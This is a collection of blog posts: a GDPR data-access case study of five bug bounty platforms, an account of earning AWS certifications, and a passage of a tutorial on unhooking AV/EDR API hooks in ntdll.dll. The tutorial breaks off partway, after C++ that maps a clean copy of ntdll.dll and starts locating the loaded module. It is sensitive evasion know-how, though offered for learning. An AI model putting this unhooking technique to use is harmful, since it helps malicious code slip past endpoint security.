
Bug Bounty Platforms vs. GDPR: A Case Study

22 July 2020 at 00:00

What Do Bug Bounty Platforms Store About Their Hackers?

I care a lot about data protection and privacy. I’ve also been in a situation where a bug bounty platform was able to track me down due to an incident, which was the initial trigger to ask myself:

How did they do it? And do I know what these platforms store about me and how they protect this (my) data? Not really. So why not create a little case study to find out what data they process?

One utility that comes in quite handy when trying to get this kind of information (at least for Europeans) is the General Data Protection Regulation (GDPR). The law’s main intention is to give people an extensive right to access and restrict their personal data. Although GDPR is a law of the European Union, it is extra-territorial in scope. So as soon as a company collects data about a European citizen/resident, the company is automatically required to comply with GDPR. This is the case for all bug bounty platforms that I am currently registered on. They probably cover 98% of the world-wide market: HackerOne, Bugcrowd, Synack, Intigriti, and Zerocopter.

Spoiler: All of them have to be GDPR-compliant, but not all seem to have proper processes in place to address GDPR requests.

Creating an Even Playing Field

To create an even playing field, I sent the same GDPR request to all bug bounty platforms. Since the scenario should be as realistic and real-world as possible, no platform was explicitly informed beforehand that the request, and their answer to it, would be part of a study.

  • All platforms were given the same questions, which should cover most of their GDPR response processes (see Art. 15 GDPR).
  • All platforms were given the same email aliases to include in their responses.
  • All platforms were asked to hand over a full copy of my personal data.
  • All platforms were given a deadline of one month to respond to the request. Given the increasing COVID situation back in April, all platforms were offered an extension of the deadline (as per Art. 12 par. 3 GDPR).

Analyzing the Results

First of all, to compare responses that differ considerably in style, completeness, accuracy, and thoroughness, I’ve decided to count only information that is part of the official answer. Discussions that took place after the official response are not considered here, because accepting those might create advantages across competitors. This should give a clear understanding of how thoroughly each platform reads and answers the GDPR request.

Instead of going with a kudos (points) system, I’ve decided to use a “traffic light” rating:

  • Green: All good, everything provided, expectations met.
  • Orange: Improvable; at least one (obvious) piece of information is missing or only implicitly answered.
  • Red: Left out; a substantial amount of data or a significant data point is missing, and/or expectations are unmet.

This light system is then applied to the different GDPR questions and to points derived either from the questions themselves or from the provided data.

Results Overview

To give you a quick overview of how the different platforms performed, here’s a summary showing the light indicators. For a detailed explanation of the indicators, have a look at the detailed response evaluations below.

Questions evaluated for each platform (HackerOne, Bugcrowd, Synack, Intigriti, Zerocopter):

  • Did the platform meet the deadline? (Art. 12 par. 3 GDPR)
  • Did the platform explicitly validate my identity for all provided email addresses? (Art. 12 par. 6 GDPR)
  • Did the platform hand over the results for free? (Art. 12 par. 5 GDPR)
  • Did the platform provide a full copy of my data? (Art. 15 par. 3 GDPR)
  • Is the provided data accurate? (Art. 5 par. 1 (d) GDPR)
  • Specific question: Which personal data about me is stored and/or processed by you? (Art. 15 par. 1 (b) GDPR)
  • Specific question: What is the purpose of processing this data? (Art. 15 par. 1 (a) GDPR)
  • Specific question: Who has received or will receive my personal data (including recipients in third countries and international organizations)? (Art. 15 par. 1 (c) GDPR)
  • Specific question: If the personal data wasn’t supplied directly by me, where does it originate from? (Art. 15 par. 1 (g) GDPR)
  • Specific question: If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? (Art. 15 par. 2 GDPR and Art. 46 GDPR)

Detailed Answers

HackerOne

Request sent out: 1st April 2020
Response received: 30th April 2020
Response style: Email with attachment
Sample of their response:

Question Official Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Via email. I had to send a random, unique code from each of the mentioned email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? No. A copy of the VPN access logs/packet dumps was not provided.

However, since this is not a general feature, I do not consider this to be a significant data point, but still a missing one.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First and last name, email address, IP addresses, phone number, social identities (Twitter, Facebook, LinkedIn), address, shirt size, bio, website, payment information, VPN access & packet log HackerOne provided a quite extensive list of IP addresses (both IPv4 and IPv6) that I have used, but based on the provided dataset it is not possible to say when they started recording them or how long they are retained.

HackerOne explicitly mentioned that they are actively logging VPN packets for specific programs. However, they currently do not have any ability to search it for personal data (it’s also not used for anything, according to HackerOne).
What is the purpose of processing this data? Operate our Services; fulfill our contractual obligations in our service contracts with customers; review and enforce compliance with our terms, guidelines, and policies; analyze the use of the Services in order to understand how we can improve our content, service offerings, and products; administrative and other business purposes; matching finders to customer programs -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Zendesk, PayPal, Slack, Intercom, Coinbase, CurrencyCloud, Sterling While analyzing the provided dataset, I noticed that the list was missing a specific third party called “TripActions”, which is used to book everything around live hacking events. This is a missing data point, but a non-general one, so the indicator is only orange.

HackerOne added the data point as a result of this study.
If the personal data wasn’t supplied directly by me, where does it originate from? HackerOne does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? This question wasn’t answered as part of the official response. I’ve notified HackerOne about the missing information afterwards, and they’ve provided the following:

Vendors must undergo due diligence as required by GDPR, and where applicable, model clauses are in place.

Remarks

HackerOne provided an automated and tool-friendly report. While the primary information was summarized in an email, I received quite a huge JSON file, which was easily parsable using your preferred scripting language. However, if a non-technical person received the data this way, they’d probably have trouble getting useful information out of it.
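To illustrate what “easily parsable” means here, a few lines of Python are enough to flatten such a nested JSON export into readable key paths. The field names below are invented for illustration only and do not reflect HackerOne’s actual export format:

```python
import json

def flatten(obj, prefix=""):
    """Recursively flatten nested dicts/lists into dot-separated key paths."""
    items = {}
    if isinstance(obj, dict):
        for key, value in obj.items():
            items.update(flatten(value, f"{prefix}{key}."))
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            items.update(flatten(value, f"{prefix}{i}."))
    else:
        items[prefix.rstrip(".")] = obj
    return items

# Hypothetical structure -- a real export will use different field names.
export = json.loads('{"profile": {"name": "Jane", "ips": ["198.51.100.7", "203.0.113.9"]}}')
for path, value in flatten(export).items():
    print(f"{path}: {value}")
```

Dumping every key path and its value this way makes it much easier to spot which personal data points the export actually contains.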

Bugcrowd

Request sent out: 1st April 2020
Response received: 17th April 2020
Response style: Email with a screenshot of an Excel table
Sample of their response:

Question Official Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? No identity validation was performed. I sent the request to their official support channel, but there was no explicit validation to verify it was really me, for any of my provided email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? No. Bugcrowd provided a screenshot of what looks like an Excel file with a few pieces of information on it. In fact, the screenshot you can see above is not even a sample but their complete response.
However, the provided data is not complete, since it is missing many data points that can be found on the researcher portal, such as the history of authenticated devices (you can see your sessions’ IP addresses on your Bugcrowd profile), my ISC2 membership number, and everything around identity verification.

There might be more data points, such as logs collected through the proxies or VPN endpoints that some programs require, but no information was provided about that.

Bugcrowd neither provided anything about the other given email addresses nor denied having anything related to them.
Is the provided data accurate? No. The provided data isn’t accurate. The address information, email addresses, and payment information are outdated (they do not reflect my current Bugcrowd settings), which indicates that Bugcrowd stores more than they’ve provided.
Which personal data about me is stored and/or processed by you? First & last name, address, shirt size, country code, LinkedIn profile, GooglePlus address, previous email address, PayPal email address, website, current IP sign-in, bank information, and the Payoneer ID This was only implicitly answered through the provided copy of my data.

As mentioned before, it seems like there is a significant amount of information missing.
What is the purpose of processing this data? - This question wasn’t answered.
Who has received or will receive my personal data (including recipients in third countries and international organizations)? - This question wasn’t answered.
If the personal data wasn’t supplied directly by me, where does it originate from? - This question wasn’t answered.
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This question wasn’t answered.

Remarks

The “copy of my data” was essentially the screenshot of the Excel file, as shown above. I was astonished by the compactness of the answer and asked again to have all the provided questions answered as per GDPR. What followed was quite a long discussion with the responsible personnel at Bugcrowd. I mentioned more than once that the provided data was inaccurate and incomplete, and that they had left out most of the questions, which I have a right by law to get answers to. Still, they insisted that all answers were GDPR-compliant and complete.

I’ve also offered them an extension of the deadline in case they needed more time to evaluate all questions. However, Bugcrowd did not want to take the extension. The discussion ended with the following answer on 17th April:

We’ve done more to respond to you that any other single GDPR request we’ve ever received since the law was passed. We’ve done so during a global pandemic when I think everyone would agree that the world has far more important issues that it is facing. I need to now turn back to those things.

I’ve given up at that point.

Synack

Request sent out: 25th March 2020
Response received: 3rd July 2020
Response style: Email with a collection of PDFs, DOCXs, XLSXs
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, with an extension of 2 months. Synack explicitly requested the extension.
Did the platform explicitly validate my identity for all provided email addresses? No. I’ve sent the initial request via their official support channel, but no further identity verification was done.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Very likely not. Synack uses a VPN solution called “LaunchPoint” (respectively “LaunchPoint+”), which every participant is required to go through when testing targets. What they do know - at least - is when I am connected to the VPN, which target I am connected to, and how long I am connected to it. However, neither a connection log nor a full dump was provided as part of the data copy.

The same applies to the system called “TUPOC”, which was not mentioned.

Synack neither provided anything about the other given email addresses nor denied having anything related to them.

Since I consider these to be significant data points in the context of Synack that weren’t provided, the indicator is red.
Is the provided data accurate? Yes. The data that was provided is accurate, though.
Which personal data about me is stored and/or processed by you? Identity information: full name, location, nationality, date of birth, age, photograph, passport or other unique ID number, LinkedIn Profile, Twitter handle, website or blog, relevant certifications, passport details (including number, expiry date, issuing country), Twitter handle and Github handle

Taxation information: W-BEN tax form information, including personal tax number

Account information: Synack Platform username and password, log information, record of agreement to the Synack Platform agreements (ie terms of use, code of conduct, insider trading policy and privacy policy) and vulnerability submission data;

Contact details: physical address, phone number, and email address

Financial information: bank account details (name of bank, BIC/SWIFT, account type, IBAN number), PayPal account details and payment history for vulnerability submissions

Data with respect to your engagement on the Synack Red Team: Helpdesk communications with Synack, survey response information, data relating to the vulnerabilities you submitted through the Synack Platform and data related to your work on the Synack Platform
Compared to the provided data dump, a few pieces of information are missing: last visited date, last clicks on link tracking in emails, browser type and version, operating system, and gender are not mentioned, but still processed.

“Log information” in the context of “Account information” and “data related to your work on the Synack Platform” in the context of “Data with respect to your engagement on the Synack Red Team” are too vague, since they could mean anything.

There is no mention of either LaunchPoint, LaunchPoint+ or TUPOC details.

Since I do consider these to be significant data points in the context of Synack, the indicator is red.
What is the purpose of processing this data? Recruitment, including screening of educational and professional background data prior to and during the course of the interviewing process and engagement, including carrying out background checks (where permitted under applicable law).

Compliance with all relevant legal, regulatory and administrative obligations

The administration of payments, special awards and benefits, the management, and the reimbursement of expenses.

Management of researchers

Maintaining and ensuring the communication between Synack and the researchers.

Monitoring researcher compliance with Synack policies

Maintaining the security of Synack’s network customer information
A really positive aspect of this answer is that Synack included the retention times of each data point.
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Cloud storage providers (Amazon Web Services and Google), identification verification providers, payment processors (including PayPal), customer service software providers, communication platforms and messaging platform to allow us to process your customer support tickets and messages, customers, background search firms, applicant tracking system firm. Synack referred to their right to mostly only name “categories of third-parties” except for AWS and Google. While this shows some transparency issues, it is still legal to do so.
If the personal data wasn’t supplied directly by me, where does it originate from? Synack does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? Synack engages third parties in connection with the operation of Synack’s crowdsourced penetration testing business. To the extent your personal data is stored by these third-party providers, they store your personal data in either the European Economic Area or the United States. The only thing Synack states here is that data is stored in the EEA or the US, but the storage location itself is not a safeguard. Therefore, the indicator is red.

Remarks

The communication process with Synack was rather slow because it seems like it takes them some time to get information from different vendors.

Update 23rd July 2020:
One document was lost in the conversations with Synack, which turns a couple of their points from red to green. The document was digitally signed, and thanks to the included proofs, I can confirm that it was signed within the deadline set for the GDPR request. The document itself tries to answer the specific questions, but there are some inconsistencies compared to the also-attached copy of the privacy policy (in terms of data points being named in one but not the other document), which made it quite hard to create a unique list of data points. However, I’ve still updated the table for Synack accordingly.

Intigriti

Request sent out: 7th April 2020
Response received: 4th May 2020
Response style: Email with PDF and JSON attachments.
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Yes. Via email. I had to send a random, unique code from each of the mentioned email addresses.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Yes. I couldn’t find any missing data points.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First and last name, address, phone number, email address, website address, Twitter handle, LinkedIn page, shirt size, passport data, email conversation history, accepted program invites, payment information (banking and PayPal), payout history, IP address history of successful logins, history of accepted program terms and conditions, followed programs, reputation tracking, and the time when a submission has been viewed.

Data categories processed: User profile information, Identification history information, Personal preference information, Communication preference information, Public preference information, Payment methods, Payout information, Platform reputation information, Program application information, Program credential information, Program invite information, Program reputation information, Program TAC acceptance information, Submission information, Support requests, Commercial requests, Program preference information, Mail group subscription information, CVR Download information, Demo request information, Testimonial information, Contact request information.
I couldn’t find any missing data points.

A long, long time ago, Intigriti had a VPN solution enabled for some of their customers, but I haven’t seen it active since, so I no longer consider this data point.
What is the purpose of processing this data? Purpose: Public profile display, Customer relationship management, Identification & authorization, Payout transaction processing, Bookkeeping, Identity checking, Preference management, Researcher support & community management, Submission creation & management, Submission triaging, Submission handling by company, Program credential handling, Program inviting, Program application handling, Status reporting, Reactive notification mail sending, Pro-active notification mail sending, Platform logging & performance analysis. -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Intercom, Mailerlite, Google Cloud Services, Amazon Web Services, Atlas, Onfido, several payment providers (TransferWise, PayPal, Payoneer), business accounting software (Yuki), Intigriti staff, Intigriti customers, encrypted backup storage (unnamed), Amazon SES. I’ve noticed a little contradiction in their report: while saying data is transferred to these parties (which include third-country companies such as Google and Amazon), they also included a “Data Transfer” section saying “We do not transfer any personal information to a third country.”

After asking for clarification, Intigriti told me that they only host in the Europe region with regard to AWS and Google.
If the personal data wasn’t supplied directly by me, where does it originate from? Intigriti does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This information wasn’t explicitly provided, but can be found in their privacy policy: “We will ensure that any transfer of personal data to countries outside of the European Economic Area will take place pursuant to the appropriate safeguards.”

However, “appropriate safeguards” are not defined.

Remarks

Intigriti provided the most well-written and structured report of all queried platforms, allowing a non-technical reader to get all the necessary information quickly. In addition to that, a bundle of JSON files was provided to read in all data programmatically.
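As a rough sketch of what reading in such a bundle programmatically can look like (the directory and file names here are made up for illustration, not Intigriti’s actual export layout), the whole export can be loaded into a single Python dict keyed by file name:

```python
import json
from pathlib import Path

def load_export(directory):
    """Load every JSON file from a data-export directory into one dict,
    keyed by file name without extension (e.g. 'submissions', 'payouts')."""
    data = {}
    for path in Path(directory).glob("*.json"):
        with path.open(encoding="utf-8") as fh:
            data[path.stem] = json.load(fh)
    return data

# Hypothetical usage -- real category names depend on the platform's export:
# bundle = load_export("intigriti_export/")
# print(sorted(bundle))  # list the data categories included in the export
```

Having every category in one structure makes it straightforward to diff the export against what you expect the platform to store.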

Zerocopter

Request sent out: 14th April 2020
Response received: 12th May 2020
Response style: Email with PDF
Sample of their response:

Question Answer Comments Indicator
Did the platform meet the deadline? Yes, without an extension. -
Did the platform explicitly validate my identity for all provided email addresses? Yes. Zerocopter validated all email addresses that I mentioned in my request by asking personal questions about the account in question and by letting me send emails with randomly generated strings from each address.
Did the platform hand over the results for free? No fee was charged. -
Did the platform provide a full copy of my data? Yes. I couldn’t find any missing data points.
Is the provided data accurate? Yes. -
Which personal data about me is stored and/or processed by you? First and last name, country of residence, bio, email address, passport details, company address, payment details, email conversations, VPN log data (retained for one month), metadata about website visits (such as IP addresses, browser type, date and time), personal information as part of security reports, time spent on pages, contact information with Zerocopter themselves such as provided through email, and marketing information (through newsletters). I couldn’t find any missing data points.
What is the purpose of processing this data? Optimisation of the Website, Application, and Services; provision of information; implementation of the agreement between you and Zerocopter (maintaining contact) -
Who has received or will receive my personal data (including recipients in third countries and international organizations)? Some data might be transferred outside the European Economic Area, but only with my consent, unless it is required for the implementation of the agreement between Zerocopter and me, there is an obligation to transmit it to government agencies, a training event is held, or the business is reorganized. Zerocopter did not explicitly name any of these third parties, except for “HubSpot”.
If the personal data wasn’t supplied directly by me, where does it originate from? Zerocopter does not enrich data. -
If my personal data has been transferred to a third country or organization, which guarantees are given based on article 46 GDPR? - This information wasn’t explicitly provided, but can be found in their privacy policy: “These third parties (processors) process your personal data exclusively within our assignment and we conclude processor agreements with these third parties which are compliant with the requirements of GDPR (or its Netherlands ratification AVG)”.

Remarks

For the largest part, Zerocopter only cited their privacy policy, which is a bit hard to read for people without a legal background.

Conclusion

For me, this small study holds a couple of interesting findings that might or might not surprise you:

  • In general, European bug bounty platforms like Intigriti and Zerocopter seem to be better prepared for incoming GDPR requests than their US competitors.
  • Bugcrowd and Synack seem to lack a couple of processes to adequately address GDPR requests, which unfortunately also includes proper identity verification.
  • Compared to Bugcrowd and Synack, HackerOne did quite well, considering they are also US-based. So being a US platform is no excuse for not providing a proper GDPR response.
  • None of the platforms has explicitly and adequately described the safeguards required from their partners to protect personal data. HackerOne handed over this data after their official response; Intigriti and Zerocopter have not explicitly answered that question, although both have (vague) statements about it in their corresponding privacy policies. This point does not seem to be a priority for the platforms, or it is simply a rarely asked question.

See you next year ;-)

AWS Certification Trifecta

28 June 2020 at 11:20

 

 

When the dust settled here’s what I was left with 😛

Date: Monday 05/04/2020 – 1800 hrs
Thoughts: “You should be embarrassed at how severely deficient you are in practical cloud knowledge.”

Background

This is exactly how all my journeys begin (inside my head): typically being judgmental and unfairly harsh on myself. That evening I started to research the cloud market share of Amazon, Azure, and Google. It confirmed what I suspected, with AWS leading (~34%), Azure having roughly half of AWS’s share (~17%), Google (~6%), and the “others” accounting for the rest. Note: although Azure owns half of AWS in market share percentage, their annual growth (62%) is double that of AWS (33%). I would start with AWS.

Now where do I begin? I reviewed their site listing all the certifications and proposed paths to achieve them. Obviously the infosec in my veins wanted to go directly for the AWS Security Specialty, but I decided not to do that. Why? I figured I would be cheating myself. I would start at the foundational level and progressively work towards the Security Specialty. To appreciate the view, so to speak. Security Specialty would be my end goal.

I had fumbled my way through deploying AWS workloads previously. I had used EC2 before (I didn’t know what it stood for or anything beyond that – a VM in the cloud was the depth of my understanding), and S3 was cloud storage (that I constantly read about being misconfigured, leading to data exposure).

As always, there’s absolutely zero pressure on me. Only the pressure from myself 😅 which is probably magnitudes worse and more intense than what anyone on the outside could inflict on me.


AWS Certified Cloud Practitioner CLF-C01

The next day I began researching Cloud Practitioner. This involves a ton of sophisticated research, better known as Google 🤣 in addition to trawling all related Reddit threads that I can find. This is how I narrow down the best materials to prepare with and what to avoid. 99% of my questions have already been answered.

After the scavenger hunt I felt like I could probably pass this one without doing any studying at all. Sometimes I have to get outside of my own head. Not sure why I have all the confidence, but it’s there (for no reason in this case) and sometimes it burns me (keep reading).

I sped through the Linux Academy Practitioner course in 3 days. It was mostly review and everything you would expect for a foundational course. Some of the topics:

    • What the cloud is & what it’s made of
    • IAM Users, Groups, Roles
    • VPCs
    • EC2
    • S3
    • Cloudfront & DNS
    • AWS Billing

Date: Monday 05/09/2020 – 0800 hrs

From the initial thought, it’s 5 days later. Exam scheduled for 1800 hrs. I’m excited but nervous, unsure what to expect. The course prepared me well and the exam felt easy. I knew by the last question that I had definitely gotten enough points to pass. I clicked next on the last question to end the exam. In a horrible play, AWS forces you to answer a survey before providing you the result.

I PASSED! You have to wait a day or two to get the official notice with a numeric score.


AWS Certified Solutions Architect – Associate SAA-C01

I clapped for myself but didn’t feel like I had done much. Practitioner is labeled foundational for a reason. Now it’s time to aim for a bigger target. Solutions Architect wouldn’t be easy; it would take a whole heap of studying to clear. I followed a similar approach, going through the Linux Academy Solutions Architect Associate course.

Funny how the brain works, because although Practitioner was easy, it still gave me a chip on my shoulder going into this. Pick any post on the Solutions Architect Associate and you’ll hear the pain: how tough it was, how it was the most challenging cert of folks’ lives. I know from the CISSP not to listen to this. I’m not sure if folks don’t fully prepare or just feel better about themselves exaggerating the complexity after passing to continue the horror stories. Maybe to impose some of the fear they had onto others coming behind them? One thing about me: I get tired of studying for the same thing quick. There’s no way I would/could ever study for a cert for 5 months, 6 months, a year. Yeah-Freaking-Right.

The cool thing about AWS is that all the certifications build upon the foundation. No matter which one you go for, it’s pretty much going deeper into the usage and capabilities of the appropriate related services. I chose to sit for C01; although C02 had recently been released, I wasn’t going to risk being a live beta tester. I was concerned about the newer exam’s stability. As I write this, C01 is officially dead in 3 days (July 1, 2020); then all candidates will only have C02. Good luck 🤣.

Date: Monday 05/14/2020 – 0800 hrs

5 days after Practitioner (10 days total elapsed time from the initial thought)

Okay, I told you to keep reading 😂 I wish somebody would have stopped me. Since no one did, the universe had to step in. In a cocky rage I took the exam after studying for only 5 days. Clicking through the survey, I was heartbroken: I had FAILED, and I really deserved it. Who the hell did I think I was?

This is typically the time where you punch yourself and call yourself stupid. This hurt me more than it should have. I was pissed at myself. For not taking enough time to study, sure but the real hurt was because I couldn’t will myself to pass even with minimal studying. LMAO. (WTF Bro) Here’s what I woke up to the next day.

What 🤬 I only missed it by 20 points. FML. That made it worse.

You BIG Dummy!

Okay. I picked myself up and scheduled my retake for exactly 2 weeks out. After seeing that score I felt like if I could have retaken it the next day, I would have passed (again, idk why; maybe that’s my way of dealing with failure, going even further balls to the wall 🤣). The mandatory 2 weeks felt like forever. I was studying at least 6 hrs a day on weekdays and sun-up to sun-down on weekends. Nothing and no one could get any of my time. Besides this, the only other cert I ever had to retake was CRTP. It humbled me and fueled me even more.

I figured I needed to learn from an alternative source – I went to A Cloud Guru’s course, which I felt was really lite compared to Linux Academy. The last week I found this Udemy course. Stephane Maarek, the instructor, is the 🐐 Thank You sir! In hindsight I could have used this alone to pass the exam. It was that good. Here’s another review I found useful while preparing for my retake. Thank you Jayendra 💗

Date: Monday 05/28/2020 – 0800 hrs

14 days after 1st Solutions Architect Associate attempt (24 days total elapsed time from initial thought)

I felt pretty confident this time (it’s justified this time). I realized how much I didn’t know after the first go-around, and how I maybe didn’t deserve the 700 the first time. I was definitely gunning for a perfect exam 😂. And I forgot to mention: when you pass any AWS cert you get 50% off the next, so failing the first attempt totally screwed up my financial efficiency and I had to pay full price for this one. I PASSED. But did you get the perfect score 🤔 I definitely didn’t feel like there was ANY question I didn’t know the answer to. Here’s what I woke up to the next day.

God knew not to give me a perfect score! Probably would have done more harm than good 😂 I was very proud of my score. I ASSAULTED/CRUSHED/ANNIHILATED THAT EXAM. TEACH YOU WHO YOU DEALING WITH 👊🏾 This is how I was feeling at the moment!

via GIPHY


Amazon AWS Certified Security SCS C01

I needed a break so I took a weekend off. Come Monday I was right back in the grind 💪🏾 I wished Stephane had created a course for the Security Specialty but he didn’t 😞 I went through the Linux Academy course. After that, I bought the John Bonso course at Tutorials Dojo.

Listen. LISTEN. 🗣🔊 LISTEN. The length of these questions is in-freaking-sane. I remember one night losing track of time, completing only like 20 questions while over 2 hours had elapsed. It quickly negged me out. I love reading, but my gosh these were monsters and the scenarios were ridiculous. I was like bump this, I’m not sure I really even want this thing that bad.

via GIPHY

I took like 2 weeks off and came back to it! I wondered if I had forgotten all the things I learned from the course; I hadn’t. Mentally I needed to prepare myself for those questions. Ultimately it’s discipline, will, and patience. I eliminated all distractions once again – nobody could get a hold of me and every ounce of free time was devoted to the task at hand. After completing all the questions there I used my free AWS practice exam. It stinks because they don’t even give you the answers. Like WTF is that about? I found any practice questions I could on the internet for 3 days straight.

Date: Monday 06/26/2020 – 0800 hrs

Now my birthday is 7/8 so I was going to schedule the exam for 7/7 to wake up to the pass on my birthday. I quickly decided not to do that in case I failed 🤣🤞🏾 so I scheduled it 4 days out on Monday 6/29.

Told you guys I don’t like studying for long. Later on that day, at about 1400 hrs, I don’t know why but I went back to the exam scheduling and saw they had an exam slot for the same day at 1545 hrs 😲 Forget it! I rescheduled it and confirmed it. As soon as I did that I thought, “why the hell did you do that?”

If there was one thing I knew, it was this: I was going to be even more disappointed than I was when I came up short on Solutions Architect the first time. I imagine it would have been something like this after failing.

via GIPHY

The exam was TOUGH. No other way to put it, and guess what? Every single question was a monster just like the Bonso questions: 2 paragraphs minimum, sometimes like four, with a tough scenario involving 3-4 services and baking security into it. All the choices are basically the same and differ slightly by the last 2 or 3 words. By the end you’ll be able to read 2-3 choices at the same time, scanning for the differences and then selecting your answer based on that.

All my exams were taken remotely, and one UNDERRATED thing that could have pushed me over the bridge for Solutions Architect is the “Whiteboard” feature on Pearson exams. I used that thing for almost every question on Security Specialty. Unless you’re a Jedi, it’s really tough to have a good understanding of what the monster is asking without a visualization. You aren’t allowed to use pen and paper. Use the Whiteboard!

Time-wise, I breezed through Practitioner in ~35 minutes, Solutions Architect in ~55 minutes, and this thing #bruh I remember looking up thinking sheesh, you’re two hours deep. I had finally finished all 65 questions. Enter second-guessing yourself:

I’m not clicking next or ending the exam this time! There were maybe 20 questions I was unsure on. You don’t have to be a mathematician to realize 20 wrong answers out of 65 equals a fail. Listen – reviewing your answers when you’re confident is a cursory thing; when you’re not confident it’s like playing Russian roulette. I changed about 9 answers total, each one filled with the thought, “You’re probably on the borderline right now; you’re going to change an answer that’s correct, make it wrong, and that’s going to be your demise.” It’s worth mentioning that only about 50% of the questions are single choice. The others are select the best 2 or 3 out of 6 or 7 choices. The questions are drawn randomly from a bank like most exams, so I’m not sure if the same will apply to you, but I did notice at least 2 instances where future questions cleared up previous ones. Example:

    • Q3   – Which of the following bucket policies allows users from account xyz123 to put resources inside of it?
    • Q17 – Based on the following bucket policy that allows users from account abc456 to put resources inside of it, what of the following accounts wouldn’t be able to access objects?

Flag questions that seem similar so when you review you can easily identify, compare, contrast you may get a bone thrown your way.

The majority of the exam was exactly that: reading and understanding policies – IAM, KMS, bucket policies. You better be able to read and understand them as if they were plain English. There was a ton of KMS-related material; make SURE you know the nitty gritty like imported key material and all the different KMS encryption types – when, where, rotation, etc.

Clicked next, through the survey and I had PASSED!


I think I’ve paid my dues this year guys. I stepped outside of my comfort zone entirely & I’m very proud of that. This year’s timeline looks like the following:

  • CISSP 4/9
  • Cloud Practitioner 5/9
  • Solutions Architect 5/14
  • Security Specialty 6/26

Because of Covid-19 this will be the first year since I stopped being poor 😂 (~5 years after graduating) that I won’t be on an island celebrating. Such is life. I bought myself AWAE as a birthday gift; I’m going to dig into that starting July 11.

If you need advice, support or just want to talk I’m always around. Stay safe and definitely stay thirsty (for knowledge).

The post AWS Certification Trifecta appeared first on Certification Chronicles.

PE Parsing and Defeating AV/EDR API Hooks in C++

11 June 2020 at 15:20

PE Parsing and Defeating AV/EDR API Hooks in C++

Introduction

This post is a look at defeating AV/EDR-created API hooks, using code originally written by @spotless located here. I want to make clear that spotless did the legwork on this, I simply made some small functional changes and added a lot of comments and documentation. This was mainly an exercise in improving my understanding of the topic, as I find going through code function by function with the MSDN documentation handy is a good way to get a handle on how it works. It can be a little tedious, which is why I’ve documented the code rather excessively, so that others can hopefully learn from it without having to go to the same trouble.

Many thanks to spotless!

This post covers several topics, like system calls, user-mode vs. kernel-mode, and Windows architecture that I have covered somewhat here. I’m going to assume a certain amount of familiarity with those topics in this post.

The code for this post is available here.

Understanding API Hooks

What is hooking exactly? It’s a technique commonly used by AV/EDR products to intercept a function call and redirect the flow of code execution to the AV/EDR in order to inspect the call and determine if it is malicious or not. This is a powerful technique, as the defensive application can see each and every function call you make, decide if it is malicious, and block it, all in one step. Even worse (for attackers, that is), these products hook native functions in system libraries/DLLs, which sit beneath the traditionally used Win32 APIs. For example, WriteProcessMemory, a commonly used Win32 API for writing shellcode into a process address space, actually calls the undocumented native function NtWriteVirtualMemory, contained in ntdll.dll. NtWriteVirtualMemory in turn is actually a wrapper function for a system call to kernel-mode. Since AV/EDR products are able to hook function calls at the lowest level accessible to user-mode code, there’s no escaping them. Or is there?

Where Hooks Happen

To understand how we can defeat hooks, we need to know how and where they are created. When a process is started, certain libraries or DLLs are loaded into the process address space as modules. Each application is different and will load different libraries, but virtually all of them will use ntdll.dll no matter their functionality, as many of the most common Windows functions reside in it. Defensive products take advantage of this fact by hooking function calls within the DLL. By hooking, we mean actually modifying the assembly instructions of a function, inserting at the beginning of the function an unconditional jump into the EDR’s code. The EDR processes the function call, and if it is allowed, execution flow jumps back to the original function so that it performs as it normally would, with the calling process none the wiser.

Identifying the Hooks

So we know that within our process, the ntdll.dll module has been modified and we can’t trust any function calls that use it. How can we undo these hooks? We could identify the exact version of Windows we are on, find out what the actual assembly instructions should be, and try to patch them on the fly. But that would be tedious, error-prone, and not reusable. It turns out there is a pristine, unmodified, unhooked version of ntdll.dll already sitting on disk!

So the strategy looks like this. First we’ll map a copy of ntdll.dll into our process memory, in order to have a clean version to work with. Then we will identify the location of the hooked version within our process. Finally we simply overwrite the hooked code with the clean code and we’re home free!

Simple right?

Mapping NtDLL.dll

Sarcasm aside, mapping a view of the ntdll.dll file is actually quite straightforward. We get a handle to ntdll.dll, get a handle to a file mapping of it, and map it into our process:

HANDLE hNtdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
HANDLE hNtdllFileMapping = CreateFileMapping(hNtdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
LPVOID ntdllMappingAddress = MapViewOfFile(hNtdllFileMapping, FILE_MAP_READ, 0, 0, 0);

Pretty simple. Now that we have a view of the clean DLL mapped into our address space, let’s find the hooked copy.

To find the location of the hooked ntdll.dll within our process memory, we need to locate it within the list of modules loaded in our process. Modules in this case are DLLs and the primary executable of our process, and there is a list of them stored in the Process Environment Block. A great summary of the PEB is here. To access this list, we get a handle to our process and to the module we want, and then call GetModuleInformation. We can then retrieve the base address of the DLL from our miModuleInfo struct:

HANDLE hCurrentProcess = GetCurrentProcess();
HMODULE hNtdllModule = GetModuleHandleA("ntdll.dll");
MODULEINFO miModuleInfo = {};
